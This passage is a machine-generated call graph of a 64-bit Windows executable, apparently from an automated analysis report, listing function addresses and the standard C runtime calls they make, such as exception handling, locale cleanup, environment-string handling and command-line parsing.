API calls 7478->7481 7482 7ff7aa958df0 7479->7482 7480->7478 7481->7475 7483 7ff7aa958284 _set_fmode 7 API calls 7482->7483 7483->7472 7485 7ff7aa958878 _set_fmode 7 API calls 7484->7485 7486 7ff7aa958205 __free_lconv_mon 7485->7486 7487 7ff7aa958878 _set_fmode 7 API calls 7486->7487 7488 7ff7aa958227 7487->7488 7488->7462 7489 7ff7aa96089e 7490 7ff7aa9608b6 7489->7490 7496 7ff7aa960921 7489->7496 7491 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7490->7491 7490->7496 7492 7ff7aa960903 7491->7492 7493 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7492->7493 7494 7ff7aa960918 7493->7494 7495 7ff7aa957dc8 34 API calls 7494->7495 7495->7496 7149 7ff7aa957320 7150 7ff7aa957339 7149->7150 7151 7ff7aa957335 7149->7151 7152 7ff7aa95a000 51 API calls 7150->7152 7153 7ff7aa95733e 7152->7153 7164 7ff7aa95a568 GetEnvironmentStringsW 7153->7164 7156 7ff7aa95734b 7159 7ff7aa958b3c __free_lconv_mon 7 API calls 7156->7159 7157 7ff7aa957357 7184 7ff7aa957394 7157->7184 7159->7151 7161 7ff7aa958b3c __free_lconv_mon 7 API calls 7162 7ff7aa95737e 7161->7162 7163 7ff7aa958b3c __free_lconv_mon 7 API calls 7162->7163 7163->7151 7165 7ff7aa957343 7164->7165 7166 7ff7aa95a598 7164->7166 7165->7156 7165->7157 7167 7ff7aa95a488 WideCharToMultiByte 7166->7167 7168 7ff7aa95a5e9 7167->7168 7169 7ff7aa95a5f0 FreeEnvironmentStringsW 7168->7169 7170 7ff7aa958a64 8 API calls 7168->7170 7169->7165 7171 7ff7aa95a603 7170->7171 7172 7ff7aa95a60b 7171->7172 7173 7ff7aa95a614 7171->7173 7174 7ff7aa958b3c __free_lconv_mon 7 API calls 7172->7174 7175 7ff7aa95a488 WideCharToMultiByte 7173->7175 7176 7ff7aa95a612 7174->7176 7177 7ff7aa95a637 7175->7177 7176->7169 7178 7ff7aa95a63b 7177->7178 7179 7ff7aa95a645 7177->7179 7180 7ff7aa958b3c __free_lconv_mon 7 API calls 7178->7180 7181 7ff7aa958b3c __free_lconv_mon 7 API calls 7179->7181 7182 7ff7aa95a643 FreeEnvironmentStringsW 7180->7182 7181->7182 7182->7165 7185 7ff7aa9573b9 7184->7185 7186 7ff7aa958ac4 _set_fmode 7 API calls 7185->7186 7195 7ff7aa9573ef 
7186->7195 7187 7ff7aa958b3c __free_lconv_mon 7 API calls 7188 7ff7aa95735f 7187->7188 7188->7161 7189 7ff7aa95746a 7190 7ff7aa958b3c __free_lconv_mon 7 API calls 7189->7190 7190->7188 7191 7ff7aa958ac4 _set_fmode 7 API calls 7191->7195 7192 7ff7aa957459 7203 7ff7aa9574a4 7192->7203 7193 7ff7aa957e4c __std_exception_copy 34 API calls 7193->7195 7195->7189 7195->7191 7195->7192 7195->7193 7197 7ff7aa95748f 7195->7197 7200 7ff7aa958b3c __free_lconv_mon 7 API calls 7195->7200 7201 7ff7aa9573f7 7195->7201 7199 7ff7aa956c80 _invalid_parameter_noinfo_noreturn 12 API calls 7197->7199 7198 7ff7aa958b3c __free_lconv_mon 7 API calls 7198->7201 7202 7ff7aa9574a2 7199->7202 7200->7195 7201->7187 7204 7ff7aa9574a9 7203->7204 7205 7ff7aa957461 7203->7205 7206 7ff7aa9574d2 7204->7206 7207 7ff7aa958b3c __free_lconv_mon 7 API calls 7204->7207 7205->7198 7208 7ff7aa958b3c __free_lconv_mon 7 API calls 7206->7208 7207->7204 7208->7205 7209 7ff7aa957d20 7210 7ff7aa958b3c __free_lconv_mon 7 API calls 7209->7210 7211 7ff7aa957d30 7210->7211 7212 7ff7aa958b3c __free_lconv_mon 7 API calls 7211->7212 7213 7ff7aa957d44 7212->7213 7214 7ff7aa958b3c __free_lconv_mon 7 API calls 7213->7214 7215 7ff7aa957d58 7214->7215 7216 7ff7aa958b3c __free_lconv_mon 7 API calls 7215->7216 7217 7ff7aa957d6c 7216->7217 7497 7ff7aa9552aa 7498 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7497->7498 7500 7ff7aa9552b7 __CxxCallCatchBlock 7498->7500 7499 7ff7aa9552fb RaiseException 7501 7ff7aa955322 7499->7501 7500->7499 7502 7ff7aa9539fc __CxxCallCatchBlock 38 API calls 7501->7502 7507 7ff7aa95532a 7502->7507 7503 7ff7aa955353 __CxxCallCatchBlock 7504 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7503->7504 7505 7ff7aa955366 7504->7505 7506 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7505->7506 7508 7ff7aa95536f 7506->7508 7507->7503 7509 7ff7aa953c64 __CxxCallCatchBlock 38 API calls 7507->7509 7509->7503 7218 7ff7aa960934 7221 7ff7aa95539c 7218->7221 7222 7ff7aa955403 7221->7222 7223 7ff7aa9553b6 7221->7223 7223->7222 
7224 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7223->7224 7224->7222 6946 7ff7aa9531b0 6947 7ff7aa9531c8 6946->6947 6948 7ff7aa9531e4 6946->6948 6947->6948 6955 7ff7aa953d20 6947->6955 6953 7ff7aa957dc8 34 API calls 6954 7ff7aa95320a 6953->6954 6961 7ff7aa9540a0 6955->6961 6958 7ff7aa953d34 6959 7ff7aa9540a0 _CreateFrameInfo 38 API calls 6958->6959 6960 7ff7aa953202 6959->6960 6960->6953 6967 7ff7aa9540bc 6961->6967 6964 7ff7aa9531f6 6964->6958 6965 7ff7aa957df4 _CreateFrameInfo 34 API calls 6966 7ff7aa9540b8 6965->6966 6968 7ff7aa9540a9 6967->6968 6970 7ff7aa9540db __vcrt_InitializeCriticalSectionEx 6967->6970 6968->6964 6968->6965 6969 7ff7aa954160 SetLastError 6969->6968 6970->6969 6976 7ff7aa9540fe __std_exception_destroy 6970->6976 6977 7ff7aa955b24 6970->6977 6972 7ff7aa95410e 6972->6969 6973 7ff7aa954135 6972->6973 6975 7ff7aa955b24 _CreateFrameInfo 3 API calls 6972->6975 6974 7ff7aa955b24 _CreateFrameInfo 3 API calls 6973->6974 6973->6976 6974->6976 6975->6973 6976->6969 6982 7ff7aa9558fc 6977->6982 6979 7ff7aa955b52 6980 7ff7aa955b64 TlsSetValue 6979->6980 6981 7ff7aa955b5c 6979->6981 6980->6981 6981->6972 6984 7ff7aa9559e6 __vcrt_InitializeCriticalSectionEx 6982->6984 6985 7ff7aa955940 __vcrt_InitializeCriticalSectionEx 6982->6985 6983 7ff7aa95596e LoadLibraryExW 6983->6984 6983->6985 6984->6979 6985->6983 6985->6984 6986 7ff7aa9559b1 LoadLibraryExW 6985->6986 6986->6984 6986->6985 6987 7ff7aa9551b0 6988 7ff7aa9540a0 _CreateFrameInfo 38 API calls 6987->6988 6989 7ff7aa9551e5 6988->6989 6990 7ff7aa9540a0 _CreateFrameInfo 38 API calls 6989->6990 6991 7ff7aa9551f3 __except_validate_context_record 6990->6991 6992 7ff7aa9540a0 _CreateFrameInfo 38 API calls 6991->6992 6993 7ff7aa955237 6992->6993 6994 7ff7aa9540a0 _CreateFrameInfo 38 API calls 6993->6994 6995 7ff7aa955240 6994->6995 6996 7ff7aa9540a0 _CreateFrameInfo 38 API calls 6995->6996 6997 7ff7aa955249 6996->6997 7010 7ff7aa9539c0 6997->7010 7000 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7001 
7ff7aa955279 __CxxCallCatchBlock 7000->7001 7017 7ff7aa9539fc 7001->7017 7003 7ff7aa955353 __CxxCallCatchBlock 7004 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7003->7004 7005 7ff7aa955366 7004->7005 7006 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7005->7006 7008 7ff7aa95536f 7006->7008 7011 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7010->7011 7012 7ff7aa9539d1 7011->7012 7013 7ff7aa9539dc 7012->7013 7014 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7012->7014 7015 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7013->7015 7014->7013 7016 7ff7aa9539ed 7015->7016 7016->7000 7016->7001 7018 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7017->7018 7019 7ff7aa953a0e 7018->7019 7020 7ff7aa953a49 7019->7020 7022 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7019->7022 7021 7ff7aa957df4 _CreateFrameInfo 34 API calls 7020->7021 7023 7ff7aa953a4e 7021->7023 7024 7ff7aa953a19 7022->7024 7024->7020 7025 7ff7aa953a35 7024->7025 7026 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7025->7026 7027 7ff7aa953a3a 7026->7027 7027->7003 7028 7ff7aa953c64 7027->7028 7029 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7028->7029 7030 7ff7aa953c72 7029->7030 7030->7003 7225 7ff7aa957730 7228 7ff7aa9576a8 7225->7228 7227 7ff7aa957759 7229 7ff7aa9576c6 7228->7229 7230 7ff7aa9576ff 7229->7230 7231 7ff7aa95b428 7 API calls 7229->7231 7230->7227 7231->7229 7031 7ff7aa95cdf8 7032 7ff7aa95ce00 7031->7032 7033 7ff7aa95ce15 7032->7033 7035 7ff7aa95ce2e 7032->7035 7034 7ff7aa958284 _set_fmode 7 API calls 7033->7034 7036 7ff7aa95ce1a 7034->7036 7038 7ff7aa958114 34 API calls 7035->7038 7039 7ff7aa95ce25 7035->7039 7037 7ff7aa956c30 _invalid_parameter_noinfo 34 API calls 7036->7037 7037->7039 7038->7039 7510 7ff7aa952904 7511 7ff7aa953140 GetModuleHandleW 7510->7511 7512 7ff7aa95290b _CreateFrameInfo 7511->7512 7513 7ff7aa95290f 7512->7513 7514 7ff7aa952e74 4 API calls 7512->7514 7515 7ff7aa952959 7514->7515 7040 7ff7aa95ac00 7041 7ff7aa95ac0c 7040->7041 7043 7ff7aa95ac33 7041->7043 7044 7ff7aa95a720 7041->7044 7045 
7ff7aa95a725 7044->7045 7046 7ff7aa95a760 7044->7046 7047 7ff7aa95a758 7045->7047 7048 7ff7aa95a746 RtlDeleteCriticalSection 7045->7048 7046->7041 7049 7ff7aa958b3c __free_lconv_mon 7 API calls 7047->7049 7048->7047 7048->7048 7049->7046 7050 7ff7aa958a00 7051 7ff7aa958a10 7050->7051 7052 7ff7aa958878 _set_fmode 7 API calls 7051->7052 7053 7ff7aa958a1b __vcrt_uninitialize_ptd 7051->7053 7052->7053 7232 7ff7aa95ef80 7233 7ff7aa95ef97 7232->7233 7234 7ff7aa95ef91 CloseHandle 7232->7234 7234->7233 7235 7ff7aa958580 7236 7ff7aa958585 7235->7236 7237 7ff7aa95859a 7235->7237 7241 7ff7aa9585a0 7236->7241 7240 7ff7aa958b3c __free_lconv_mon 7 API calls 7240->7237 7242 7ff7aa9585ea 7241->7242 7243 7ff7aa9585e2 7241->7243 7244 7ff7aa958b3c __free_lconv_mon 7 API calls 7242->7244 7245 7ff7aa958b3c __free_lconv_mon 7 API calls 7243->7245 7246 7ff7aa9585f7 7244->7246 7245->7242 7247 7ff7aa958b3c __free_lconv_mon 7 API calls 7246->7247 7248 7ff7aa958604 7247->7248 7249 7ff7aa958b3c __free_lconv_mon 7 API calls 7248->7249 7250 7ff7aa958611 7249->7250 7251 7ff7aa958b3c __free_lconv_mon 7 API calls 7250->7251 7252 7ff7aa95861e 7251->7252 7253 7ff7aa958b3c __free_lconv_mon 7 API calls 7252->7253 7254 7ff7aa95862b 7253->7254 7255 7ff7aa958b3c __free_lconv_mon 7 API calls 7254->7255 7256 7ff7aa958638 7255->7256 7257 7ff7aa958b3c __free_lconv_mon 7 API calls 7256->7257 7258 7ff7aa958645 7257->7258 7259 7ff7aa958b3c __free_lconv_mon 7 API calls 7258->7259 7260 7ff7aa958655 7259->7260 7261 7ff7aa958b3c __free_lconv_mon 7 API calls 7260->7261 7262 7ff7aa958665 7261->7262 7267 7ff7aa958444 7262->7267 7264 7ff7aa95867a 7271 7ff7aa9583bc 7264->7271 7266 7ff7aa958592 7266->7240 7269 7ff7aa958460 7267->7269 7268 7ff7aa958490 7268->7264 7269->7268 7270 7ff7aa958b3c __free_lconv_mon 7 API calls 7269->7270 7270->7268 7272 7ff7aa9583d8 7271->7272 7273 7ff7aa958698 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7272->7273 7274 7ff7aa9583e6 7273->7274 7274->7266 7054 7ff7aa951000 7055 
7ff7aa953b30 __std_exception_copy 34 API calls 7054->7055 7056 7ff7aa951029 7055->7056 7275 7ff7aa957f80 7276 7ff7aa957f88 7275->7276 7277 7ff7aa95b708 3 API calls 7276->7277 7278 7ff7aa957fb9 7276->7278 7279 7ff7aa957fb5 7276->7279 7277->7276 7281 7ff7aa957ff0 7278->7281 7282 7ff7aa95801b 7281->7282 7283 7ff7aa957ffe RtlDeleteCriticalSection 7282->7283 7284 7ff7aa95801f 7282->7284 7283->7282 7284->7279 7898 7ff7aa957c80 7901 7ff7aa957520 7898->7901 7908 7ff7aa9574e8 7901->7908 7906 7ff7aa9574a4 7 API calls 7907 7ff7aa957553 7906->7907 7909 7ff7aa9574fd 7908->7909 7910 7ff7aa9574f8 7908->7910 7912 7ff7aa957504 7909->7912 7911 7ff7aa9574a4 7 API calls 7910->7911 7911->7909 7913 7ff7aa957519 7912->7913 7914 7ff7aa957514 7912->7914 7913->7906 7915 7ff7aa9574a4 7 API calls 7914->7915 7915->7913 7285 7ff7aa95e78b 7286 7ff7aa95e7cb 7285->7286 7287 7ff7aa95ea30 7285->7287 7286->7287 7288 7ff7aa95ea12 7286->7288 7290 7ff7aa95e7ff 7286->7290 7289 7ff7aa95ea26 7287->7289 7292 7ff7aa95f540 _log10_special 12 API calls 7287->7292 7293 7ff7aa95f540 7288->7293 7292->7289 7296 7ff7aa95f560 7293->7296 7297 7ff7aa95f57a 7296->7297 7298 7ff7aa95f55b 7297->7298 7300 7ff7aa95f3a8 7297->7300 7298->7289 7301 7ff7aa95f3e8 _log10_special 7300->7301 7303 7ff7aa95f454 _log10_special 7301->7303 7311 7ff7aa95f660 7301->7311 7304 7ff7aa95f491 7303->7304 7306 7ff7aa95f461 7303->7306 7318 7ff7aa95f990 7304->7318 7314 7ff7aa95f284 7306->7314 7308 7ff7aa95f48f _log10_special 7309 7ff7aa952650 _log10_special 4 API calls 7308->7309 7310 7ff7aa95f4b9 7309->7310 7310->7298 7324 7ff7aa95f688 7311->7324 7315 7ff7aa95f2c8 _log10_special 7314->7315 7316 7ff7aa95f2dd 7315->7316 7317 7ff7aa95f990 _log10_special 7 API calls 7315->7317 7316->7308 7317->7316 7319 7ff7aa95f999 7318->7319 7320 7ff7aa95f9b0 7318->7320 7322 7ff7aa95f9a8 7319->7322 7323 7ff7aa958284 _set_fmode 7 API calls 7319->7323 7321 7ff7aa958284 _set_fmode 7 API calls 7320->7321 7321->7322 7322->7308 7323->7322 7325 7ff7aa95f6c7 _raise_exc 
_clrfp 7324->7325 7326 7ff7aa95f8dc RaiseException 7325->7326 7327 7ff7aa95f682 7326->7327 7327->7303 7516 7ff7aa954f08 7517 7ff7aa954f35 __except_validate_context_record 7516->7517 7518 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7517->7518 7519 7ff7aa954f3a 7518->7519 7522 7ff7aa954f94 7519->7522 7524 7ff7aa955022 7519->7524 7537 7ff7aa954fe8 7519->7537 7520 7ff7aa955090 7520->7537 7578 7ff7aa954688 7520->7578 7521 7ff7aa95500f 7563 7ff7aa953654 7521->7563 7522->7521 7526 7ff7aa954fed 7522->7526 7527 7ff7aa954fb6 7522->7527 7522->7537 7530 7ff7aa955041 7524->7530 7572 7ff7aa953a50 7524->7572 7526->7521 7529 7ff7aa954fc5 7526->7529 7539 7ff7aa95428c 7527->7539 7532 7ff7aa955139 7529->7532 7535 7ff7aa954fd7 7529->7535 7530->7520 7530->7537 7575 7ff7aa953a64 7530->7575 7534 7ff7aa957df4 _CreateFrameInfo 34 API calls 7532->7534 7536 7ff7aa95513e 7534->7536 7544 7ff7aa955420 7535->7544 7540 7ff7aa95429a 7539->7540 7541 7ff7aa957df4 _CreateFrameInfo 34 API calls 7540->7541 7543 7ff7aa9542ab 7540->7543 7542 7ff7aa9542f1 7541->7542 7543->7529 7545 7ff7aa953a50 Is_bad_exception_allowed 38 API calls 7544->7545 7546 7ff7aa95544f 7545->7546 7640 7ff7aa9541e8 7546->7640 7549 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7561 7ff7aa95546c __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 7549->7561 7550 7ff7aa955563 7551 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7550->7551 7553 7ff7aa955568 7551->7553 7552 7ff7aa95559e 7554 7ff7aa957df4 _CreateFrameInfo 34 API calls 7552->7554 7555 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7553->7555 7557 7ff7aa955573 7553->7557 7554->7557 7555->7557 7556 7ff7aa955580 __FrameHandler3::GetHandlerSearchState 7556->7537 7557->7556 7558 7ff7aa957df4 _CreateFrameInfo 34 API calls 7557->7558 7559 7ff7aa9555a9 7558->7559 7560 7ff7aa953a50 38 API calls Is_bad_exception_allowed 7560->7561 7561->7550 7561->7552 7561->7560 7562 7ff7aa953a78 __FrameHandler3::FrameUnwindToEmptyState 38 API calls 7561->7562 7562->7561 7644 7ff7aa9536b8 7563->7644 
7570 7ff7aa955420 __FrameHandler3::FrameUnwindToEmptyState 38 API calls 7571 7ff7aa9536a8 7570->7571 7571->7537 7573 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7572->7573 7574 7ff7aa953a59 7573->7574 7574->7530 7576 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7575->7576 7577 7ff7aa953a6d 7576->7577 7577->7520 7658 7ff7aa9555ac 7578->7658 7580 7ff7aa954b50 7581 7ff7aa957df4 _CreateFrameInfo 34 API calls 7580->7581 7583 7ff7aa954b56 7581->7583 7582 7ff7aa9547cf 7584 7ff7aa954aa1 7582->7584 7586 7ff7aa954807 7582->7586 7584->7580 7585 7ff7aa954a9f 7584->7585 7721 7ff7aa954b58 7584->7721 7588 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7585->7588 7589 7ff7aa9549d1 7586->7589 7686 7ff7aa953788 7586->7686 7592 7ff7aa954ae3 7588->7592 7589->7585 7596 7ff7aa9549ee 7589->7596 7599 7ff7aa953a50 Is_bad_exception_allowed 38 API calls 7589->7599 7590 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7594 7ff7aa954736 7590->7594 7592->7580 7595 7ff7aa954aea 7592->7595 7594->7595 7600 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7594->7600 7597 7ff7aa952650 _log10_special 4 API calls 7595->7597 7596->7585 7603 7ff7aa954a10 7596->7603 7713 7ff7aa953628 7596->7713 7598 7ff7aa954af6 7597->7598 7598->7537 7599->7596 7602 7ff7aa954746 7600->7602 7604 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7602->7604 7603->7585 7605 7ff7aa954b33 7603->7605 7606 7ff7aa954a26 7603->7606 7607 7ff7aa95474f 7604->7607 7609 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7605->7609 7608 7ff7aa954a31 7606->7608 7611 7ff7aa953a50 Is_bad_exception_allowed 38 API calls 7606->7611 7670 7ff7aa953a90 7607->7670 7615 7ff7aa955644 38 API calls 7608->7615 7613 7ff7aa954b39 7609->7613 7611->7608 7612 7ff7aa953a64 38 API calls 7631 7ff7aa954833 7612->7631 7616 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7613->7616 7617 7ff7aa954a47 7615->7617 7619 7ff7aa954b42 7616->7619 7617->7585 7622 7ff7aa9536b8 __GetUnwindTryBlock 35 API calls 7617->7622 7618 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7621 7ff7aa954791 7618->7621 7620 
7ff7aa957dc8 34 API calls 7619->7620 7620->7580 7621->7582 7624 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7621->7624 7623 7ff7aa954a61 7622->7623 7718 7ff7aa9538bc RtlUnwindEx 7623->7718 7626 7ff7aa95479d 7624->7626 7627 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7626->7627 7629 7ff7aa9547a6 7627->7629 7673 7ff7aa955644 7629->7673 7631->7589 7631->7612 7692 7ff7aa954dc8 7631->7692 7706 7ff7aa9545b4 7631->7706 7634 7ff7aa9547ba 7682 7ff7aa955734 7634->7682 7636 7ff7aa954b2d 7637 7ff7aa957dc8 34 API calls 7636->7637 7637->7605 7638 7ff7aa9547c2 __CxxCallCatchBlock std::bad_alloc::bad_alloc 7638->7636 7639 7ff7aa953d54 std::_Xinvalid_argument 2 API calls 7638->7639 7639->7636 7641 7ff7aa95420a 7640->7641 7642 7ff7aa9541ff 7640->7642 7641->7549 7643 7ff7aa95428c __GetCurrentState 34 API calls 7642->7643 7643->7641 7645 7ff7aa954284 __FrameHandler3::FrameUnwindToEmptyState 34 API calls 7644->7645 7648 7ff7aa9536e6 7645->7648 7646 7ff7aa953673 7649 7ff7aa954284 7646->7649 7647 7ff7aa953710 RtlLookupFunctionEntry 7647->7648 7648->7646 7648->7647 7650 7ff7aa95428c 7649->7650 7651 7ff7aa957df4 _CreateFrameInfo 34 API calls 7650->7651 7653 7ff7aa953681 7650->7653 7652 7ff7aa9542f1 7651->7652 7654 7ff7aa9535c4 7653->7654 7656 7ff7aa95360f 7654->7656 7657 7ff7aa9535e4 7654->7657 7655 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7655->7657 7656->7570 7657->7655 7657->7656 7659 7ff7aa954284 __FrameHandler3::FrameUnwindToEmptyState 34 API calls 7658->7659 7660 7ff7aa9555d1 7659->7660 7661 7ff7aa9536b8 __GetUnwindTryBlock 35 API calls 7660->7661 7662 7ff7aa9555e6 7661->7662 7739 7ff7aa954210 7662->7739 7665 7ff7aa95561b 7667 7ff7aa954210 __GetUnwindTryBlock 35 API calls 7665->7667 7666 7ff7aa9555f8 __FrameHandler3::GetHandlerSearchState 7742 7ff7aa954248 7666->7742 7668 7ff7aa9546ea 7667->7668 7668->7580 7668->7582 7668->7590 7671 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7670->7671 7672 7ff7aa953a9e 7671->7672 7672->7580 7672->7618 7674 7ff7aa95572b 7673->7674 7679 7ff7aa95566f 
7673->7679 7676 7ff7aa957df4 _CreateFrameInfo 34 API calls 7674->7676 7675 7ff7aa9547b6 7675->7582 7675->7634 7678 7ff7aa955730 7676->7678 7677 7ff7aa953a64 38 API calls 7677->7679 7679->7675 7679->7677 7680 7ff7aa953a50 Is_bad_exception_allowed 38 API calls 7679->7680 7681 7ff7aa954dc8 38 API calls 7679->7681 7680->7679 7681->7679 7683 7ff7aa9557a1 7682->7683 7685 7ff7aa955751 Is_bad_exception_allowed 7682->7685 7683->7638 7684 7ff7aa953a50 38 API calls Is_bad_exception_allowed 7684->7685 7685->7683 7685->7684 7687 7ff7aa954284 __FrameHandler3::FrameUnwindToEmptyState 34 API calls 7686->7687 7688 7ff7aa9537c6 7687->7688 7689 7ff7aa957df4 _CreateFrameInfo 34 API calls 7688->7689 7691 7ff7aa9537d4 7688->7691 7690 7ff7aa9538b8 7689->7690 7691->7631 7693 7ff7aa954e84 7692->7693 7694 7ff7aa954df5 7692->7694 7693->7631 7695 7ff7aa953a50 Is_bad_exception_allowed 38 API calls 7694->7695 7696 7ff7aa954dfe 7695->7696 7696->7693 7697 7ff7aa953a50 Is_bad_exception_allowed 38 API calls 7696->7697 7698 7ff7aa954e17 7696->7698 7697->7698 7698->7693 7699 7ff7aa954e43 7698->7699 7700 7ff7aa953a50 Is_bad_exception_allowed 38 API calls 7698->7700 7701 7ff7aa953a64 38 API calls 7699->7701 7700->7699 7702 7ff7aa954e57 7701->7702 7702->7693 7703 7ff7aa954e70 7702->7703 7704 7ff7aa953a50 Is_bad_exception_allowed 38 API calls 7702->7704 7705 7ff7aa953a64 38 API calls 7703->7705 7704->7703 7705->7693 7707 7ff7aa9536b8 __GetUnwindTryBlock 35 API calls 7706->7707 7708 7ff7aa9545f1 7707->7708 7709 7ff7aa953a50 Is_bad_exception_allowed 38 API calls 7708->7709 7710 7ff7aa954629 7709->7710 7711 7ff7aa9538bc 5 API calls 7710->7711 7712 7ff7aa95466d 7711->7712 7712->7631 7714 7ff7aa954284 __FrameHandler3::FrameUnwindToEmptyState 34 API calls 7713->7714 7715 7ff7aa95363c 7714->7715 7716 7ff7aa9535c4 __FrameHandler3::FrameUnwindToEmptyState 38 API calls 7715->7716 7717 7ff7aa953646 7716->7717 7717->7603 7719 7ff7aa952650 _log10_special 4 API calls 7718->7719 7720 7ff7aa9539b6 7719->7720 7720->7585 
7722 7ff7aa954da4 7721->7722 7723 7ff7aa954b91 7721->7723 7722->7585 7724 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7723->7724 7725 7ff7aa954b96 7724->7725 7726 7ff7aa954bb5 RtlEncodePointer 7725->7726 7727 7ff7aa954c08 7725->7727 7730 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7726->7730 7727->7722 7728 7ff7aa954c28 7727->7728 7729 7ff7aa954dbf 7727->7729 7731 7ff7aa953788 34 API calls 7728->7731 7732 7ff7aa957df4 _CreateFrameInfo 34 API calls 7729->7732 7734 7ff7aa954bc5 7730->7734 7737 7ff7aa954c4a 7731->7737 7733 7ff7aa954dc4 7732->7733 7734->7727 7745 7ff7aa953570 7734->7745 7736 7ff7aa9545b4 40 API calls 7736->7737 7737->7722 7737->7736 7738 7ff7aa953a50 38 API calls Is_bad_exception_allowed 7737->7738 7738->7737 7740 7ff7aa9536b8 __GetUnwindTryBlock 35 API calls 7739->7740 7741 7ff7aa954223 7740->7741 7741->7665 7741->7666 7743 7ff7aa9536b8 __GetUnwindTryBlock 35 API calls 7742->7743 7744 7ff7aa954262 7743->7744 7744->7668 7746 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7745->7746 7747 7ff7aa95359c 7746->7747 7747->7727 7057 7ff7aa954014 7064 7ff7aa95587c 7057->7064 7061 7ff7aa95402a 7062 7ff7aa954021 7061->7062 7063 7ff7aa9558c4 __vcrt_uninitialize_locks RtlDeleteCriticalSection 7061->7063 7063->7062 7065 7ff7aa955884 7064->7065 7067 7ff7aa9558b5 7065->7067 7068 7ff7aa95401d 7065->7068 7074 7ff7aa955b78 7065->7074 7069 7ff7aa9558c4 __vcrt_uninitialize_locks RtlDeleteCriticalSection 7067->7069 7068->7062 7070 7ff7aa95417c 7068->7070 7069->7068 7071 7ff7aa95418c 7070->7071 7072 7ff7aa955b24 _CreateFrameInfo 3 API calls 7071->7072 7073 7ff7aa9541a5 __vcrt_uninitialize_ptd 7071->7073 7072->7073 7073->7061 7075 7ff7aa9558fc __vcrt_InitializeCriticalSectionEx 2 API calls 7074->7075 7076 7ff7aa955bae 7075->7076 7077 7ff7aa955bc3 InitializeCriticalSectionAndSpinCount 7076->7077 7078 7ff7aa955bb8 7076->7078 7077->7078 7078->7065 6881 7ff7aa95b490 6882 7ff7aa95b4ed __vcrt_InitializeCriticalSectionEx 6881->6882 6884 7ff7aa95b4e8 __vcrt_InitializeCriticalSectionEx 
6881->6884 6883 7ff7aa95b51d LoadLibraryExW 6883->6882 6883->6884 6884->6882 6884->6883 6885 7ff7aa95b57c LoadLibraryExW 6884->6885 6885->6882 6885->6884 7328 7ff7aa95c990 7330 7ff7aa95c9af 7328->7330 7329 7ff7aa95ca28 7336 7ff7aa952a74 7329->7336 7330->7329 7333 7ff7aa95c9bf 7330->7333 7334 7ff7aa952650 _log10_special 4 API calls 7333->7334 7335 7ff7aa95ca1e 7334->7335 7339 7ff7aa952a88 IsProcessorFeaturePresent 7336->7339 7338 7ff7aa952a82 7340 7ff7aa952a9f 7339->7340 7343 7ff7aa952b28 RtlCaptureContext RtlLookupFunctionEntry 7340->7343 7342 7ff7aa952ab3 7342->7338 7344 7ff7aa952b58 RtlVirtualUnwind 7343->7344 7345 7ff7aa952b8a 7343->7345 7344->7345 7345->7342 7916 7ff7aa95c490 7917 7ff7aa95c4bd 7916->7917 7918 7ff7aa958284 _set_fmode 7 API calls 7917->7918 7923 7ff7aa95c4d2 7917->7923 7919 7ff7aa95c4c7 7918->7919 7920 7ff7aa956c30 _invalid_parameter_noinfo 34 API calls 7919->7920 7920->7923 7921 7ff7aa952650 _log10_special 4 API calls 7922 7ff7aa95c890 7921->7922 7923->7921 6117 7ff7aa9527dc 6143 7ff7aa952c70 6117->6143 6120 7ff7aa952928 6198 7ff7aa952fb4 IsProcessorFeaturePresent 6120->6198 6121 7ff7aa9527f8 6123 7ff7aa952932 6121->6123 6133 7ff7aa952816 __scrt_release_startup_lock 6121->6133 6124 7ff7aa952fb4 6 API calls 6123->6124 6126 7ff7aa95293d _CreateFrameInfo 6124->6126 6125 7ff7aa95283b 6207 7ff7aa952e74 6126->6207 6129 7ff7aa9528c1 6149 7ff7aa9530fc 6129->6149 6131 7ff7aa9528c6 6152 7ff7aa95756c 6131->6152 6133->6125 6133->6129 6187 7ff7aa955f28 6133->6187 6140 7ff7aa9528ed 6194 7ff7aa952df4 6140->6194 6144 7ff7aa952c78 6143->6144 6145 7ff7aa952c84 __scrt_dllmain_crt_thread_attach 6144->6145 6146 7ff7aa9527f0 6145->6146 6147 7ff7aa952c91 6145->6147 6146->6120 6146->6121 6147->6146 6210 7ff7aa95403c 6147->6210 6218 7ff7aa95fd80 6149->6218 6151 7ff7aa953113 GetStartupInfoW 6151->6131 6220 7ff7aa95a000 6152->6220 6154 7ff7aa9528ce 6157 7ff7aa951290 GetCommandLineW CommandLineToArgvW 6154->6157 6155 7ff7aa95757b 6155->6154 6226 7ff7aa95a3b0 6155->6226 
